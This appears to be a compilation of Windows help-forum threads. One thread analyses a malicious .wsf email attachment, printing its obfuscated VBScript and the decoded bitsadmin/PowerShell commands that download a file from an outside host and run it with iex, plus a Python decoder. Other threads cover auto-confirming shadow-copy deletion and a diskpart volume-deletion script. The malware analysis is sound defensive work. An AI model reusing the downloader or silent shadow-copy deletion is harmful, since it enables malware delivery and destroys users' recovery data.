I tried to delete the vss shadow copies via cmd and it asks for a prompt y/n. How do I automatically answer yes?
This is the syntax:
echo y | vssadmin delete shadows /all > C:\Temp\VssDeleteDriveC.log
This is the result of the syntax entered:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.
Do you really want to delete 1 shadow copies (Y/N): [N]? N
This morning I received a mail containing, among other things, a file with the extension .wsf, on which I inadvertently clicked.
I immediately realized that I had made a mistake ... but too late :(
Can you tell me if it is malicious code?
Here is the code:
<package><job id="zXGYF_83"><script language="VBScript">
' Version: 10.7.91
'
' Copyright (c) Microsoft Corporation. All rights reserved.
'
' Windows Software Licensing Management Tool.
'
Set ISUaUv=WScript.CreateObject("WScript.Shell")
jpHg="&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{stdev$$|im€$Qp($?krmvxW1xyS$€wp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
arr=split(jpHg,"dev")
For Each nEZVNX In arr
KcSOUa=""
fInEJ=Len(nEZVNX) - 1
For intI = 0 to fInEJ
KcSOUa=chr(Asc(Mid(nEZVNX,intI + 1 ,1 ))+0-4)+KcSOUa
Next
ISUaUv.run KcSOUa,false,-1
Next
</script></job></package>
Thank you!
The fact it obfuscates itself is a good indicator it may be malicious. If you want to see what it's attempting to run, you can:
Comment out this line (like below);
'ISUaUv.run KcSOUa,false,-1
Add this line below it;
WScript.Echo KcSOUa
When you run the script you will get this output;
Output:
powershell -c ""&bitsadmin /transfer rDIlrsRC https://imwithmark.com/omar/DFDLSS70S07M052Z/inter.xls %appdata%\inter.xls""
powershell -c & $lM=gc %appdata%\inter.xls| Out-String; $lM |iex
Judging by the first line, the script is using the BITSAdmin service (built into Windows) to initiate a download from the remote URL into a local XLS file stored inside your user profile AppData folder. As for the second, I'm not clear on what that does but someone with more PowerShell knowledge will be able to shed light on it.
Update
It looks to be using gc (Get-Content applet in PowerShell) to pull the content of the file into a string using the Out-String command. It then pipes this to iex (Invoke-Expression command) to be executed.
The likelihood is the inter.xls file that was downloaded contains malicious commands that are then being locally executed in the context of the local system. This is a classic script kiddie hack to get around remote code execution.
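A static alternative to editing and running the script, as an added example that is not part of the original answer: the same decoding loop (split on "dev", subtract 4 from each character code, reverse) reimplemented in Python so the commands can be read without executing anything. The function names are made up for this example, and it assumes the .wsf was saved in the Windows-1252 code page, which is why the euro sign shown in the posted string is treated as byte 0x80.

```python
import re

# Obfuscated literal copied from the jpHg variable of the .wsf posted above.
# "\u20ac" is the euro sign as rendered on the page (byte 0x80 in cp1252).
BLOB = (
    "&&wp|2vixrm`)exehtte)$wp|2vixrm3^694Q;4W4;WWPHJH3veqs3qsg2oveqlxm{qm33>wtxxl"
    "$GVwvpMHv$vijwrevx3$$rmqhewxmf*&&$g1$ppilwvi{st"
    "dev"
    "$$|im\u20ac$Qp($?krmvxW1xyS$\u20acwp|2vixrm`)exehtte)$gkAQp($*$$g1$$ppilwvi{st"
)

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
TOOL_RE = re.compile(r"\b(powershell|bitsadmin|iex|gc|out-string)\b", re.I)

def decode_stage(blob, delimiter="dev", shift=4, codepage="cp1252"):
    """Return the command lines the script would hand to WScript.Shell.Run."""
    commands = []
    for chunk in blob.split(delimiter):
        # VBScript's Asc() returns the ANSI byte value, so decode on
        # code-page bytes rather than on Unicode code points.
        raw = chunk.encode(codepage)
        plain = bytes((b - shift) % 256 for b in reversed(raw))
        commands.append(plain.decode(codepage, errors="replace"))
    return commands

def defang(url):
    """Make a URL non-clickable before it goes into a ticket or report."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(commands):
    """Collect defanged URLs and the tools named in the decoded commands."""
    urls, tools = [], []
    for cmd in commands:
        urls += [defang(u) for u in URL_RE.findall(cmd)]
        tools += [t.lower() for t in TOOL_RE.findall(cmd)]
    return {"urls": urls, "tools": sorted(set(tools))}

if __name__ == "__main__":
    cmds = decode_stage(BLOB)
    for c in cmds:
        print(c)
    print(triage(cmds))
```

Decoding on Unicode code points instead of code-page bytes would turn the two euro signs into garbage rather than the pipe characters seen in the second command.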
I am new to programming and need some help.. I need to write a powershell script and as part of it it needs to run an external executable... However I am having issues with the script not asking for an argument and even if I pass one it just seems to wait without asking anything.. so here is the part in question
#Part of my script
$app = "D:\project1\files\vshadow.exe"
$arg1 = "-da"
$arg2 = "Y"
& $app $arg1 $arg2
+++++++++++++++++++++++++++++++++++++
This is what I get in the console
PS D:\project1\files> C:\Users\Administrator\Desktop\test.ps1
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
+++++++++++++++++++++++++++++
so the .exe is to clear volume shadow copies with a -da flag (clear all).. however the step requires a Y to continue.. this when I run from cmd.exe
D:\project1\files>vshadow.exe -da
VSHADOW.EXE 3.0 - Volume Shadow Copy sample client.
Copyright (C) 2005 Microsoft Corporation. All rights reserved.
(Option: Delete all shadow copies)
This will delete all shadow copies in the system. Are you sure? [Y/N]
++++++++++++++++++++++++++++++
any help would be appreciated
Thanks,
Tom
Its doc says -da requires confirmation but does not provide a way to override. You might be able to pipe in the user input... Try this -
echo 'y' | cmd.exe /c vshadow.exe -da
I do not know of PowerShell being able to act like an Expect script.
That said, you may be able to get around the user input requirement of the -da option. Use a vshadow query to get all copies, then pipe to a foreach loop to do a vshadow delete (-ds).
I want to make a bat file in Windows that, when double-clicked,
will delete all existing partitions, even the C drive, from the computer.
That is, it will make the hard disk empty.
Please suggest a process.
How can I do this?
Thanks in advance
http://www.dban.org/ has a tool to nuke all drives.
A script to do so can be misused...
You cannot delete or format the system and boot partitions from a running Windows. All other partitions can be deleted or formatted using diskpart with a script, e.g.:
C:\>type script.txt
select volume 3
delete volume
exit
C:\>diskpart /s script.txt
Copyright (C) 1999-2008 Microsoft Corporation.
On computer: FOOBAR
Volume 3 is the selected volume.
DiskPart successfully deleted the volume.
Leaving DiskPart...
Is it possible to create a desktop shortcut that, when pressed, will open command prompt and run a pre-defined command?
Create A Shortcut That Opens The Command Prompt & Runs A Command:
Yes! You can create a shortcut to cmd.exe with a command specified after it. Alternatively you could create a batch script, if your goal is just to have a clickable way to run commands.
Steps:
Right click on some empty space in Explorer, and in the context menu go to "New/Shortcut".
When prompted to enter a location put either:
"C:\Windows\System32\cmd.exe /k your-command" This will run the command and keep (/k) the command prompt open after.
or
"C:\Windows\System32\cmd.exe /c your-command" This will run the command and then close (/c) the command prompt.
Notes:
Tested, and working on Windows 8 - Core X86-64 September 12 2014
If you want to have more than one command, place an "&" symbol in between them. For example: "C:\Windows\System32\cmd.exe /k command1 & command2".
Yes, make the shortcut's path
%comspec% /k <command>
where
%comspec% is the environment variable for cmd.exe's full path, equivalent to C:\Windows\System32\cmd.exe on most (if not all) Windows installs
/k keeps the window open after the command has run, this may be replaced with /c if you want the window to close once the command is finished running
<command> is the command you wish to run
The solutions turned out to be very simple.
Open text edit
Write the command, save as .bat.
Double click the file created and the command automatically starts running in command-prompt.
Create new text file on desktop;
Enter desired commands in text file;
Rename extension of text file from ".txt" --> ".bat"
Yes. One option you have is to create a batch file containing the command
cmd -c {your command}
or
cmd -k {your command}
The shortcut will then be to this batch file.
This is an old post but I have issues with coming across posts that have some incorrect information/syntax...
If you wanted to do this with a shortcut icon you could just create a shortcut on your desktop for the cmd.exe application. Then append a /K {your command} to the shortcut path.
So a default shortcut target path may look like "%windir%\system32\cmd.exe", just change it to %windir%\system32\cmd.exe /k {commands}
example: %windir%\system32\cmd.exe /k powercfg -lastwake
In this case I would use /k (keep open) to display results.
Arlen was right about the /k (keep open) and /c (close)
You can open a command prompt and type "cmd /?" to see your options.
http://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/cmd.mspx?mfr=true
A batch file is kind of overkill for a single command prompt command...
Hope this helps someone else
I tried this, all it did was open a cmd prompt with "cmd -c (my command)"
and didn't actually run it. see below.
C:\windows\System32>cmd -c (powercfg /lastwake)
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\windows\System32>
***Update
I changed my .bat file to read "cmd /k (powercfg /lastwake)" and it worked.
You can also leave out the () and it works too.
You can also create a shortcut on desktop that can run a specific command or even a batch file by just typing the command in "Type the Location of Item" bar in create shortcut wizard
Right click on Desktop.
Enter the command in "Type the Location of Item" bar.
Double click the shortcut to run the command.
Found detailed Instructions here
Using the Drag and Drop method
From the windows search bar type in cmd to pull up the windows bar operation.
When the command line option is shown, right click it and select Open File Location.
The file explorer opens and the shortcut link is highlighted in the folder. If it is not highlighted, then select it.
Hold down the Control key and using the mouse drag the shortcut to the desktop. If you don't see Copy to Desktop while dragging and before dropping, then push down and hold the Control key until you see the message.
Drop the link on the desktop.
Change properties as needed.
How do I change the message that comes up automatically when I start up CMD? The one where it says:
Microsoft Windows [Version 6.0.6000]
Copyright (c) 2006 Microsoft Corporation.
How do I change that automatic message?..
By editing the cmd.exe. :) (That was a joke btw, don't really try that) If you look at the cmd.exe in a hex editor, you will see that text in it. There is no easy way that I know of to change it.
Here is an ugly hack to emulate what you are wanting. First create a .cmd file that contains the following:
cmd /k init.bat
(cmd /k tells the computer to start an instance of cmd and run the parameter and not exit)
Then create your init.bat file with the following:
@echo off
cls
echo My message goes here
Then you just run your .cmd file instead of cmd.exe and you will get a command window with just your text at the top.
If I knew why you were wanting to do this, then maybe my answer could have been more specific to your needs.
You have to reverse engineer it :) Don't remember exactly how I did, but using a debugger single step until you find the place where it prints that out and edit it. I "hacked" it a bit more and it refuses doing anything, saying "do it yourself!" :)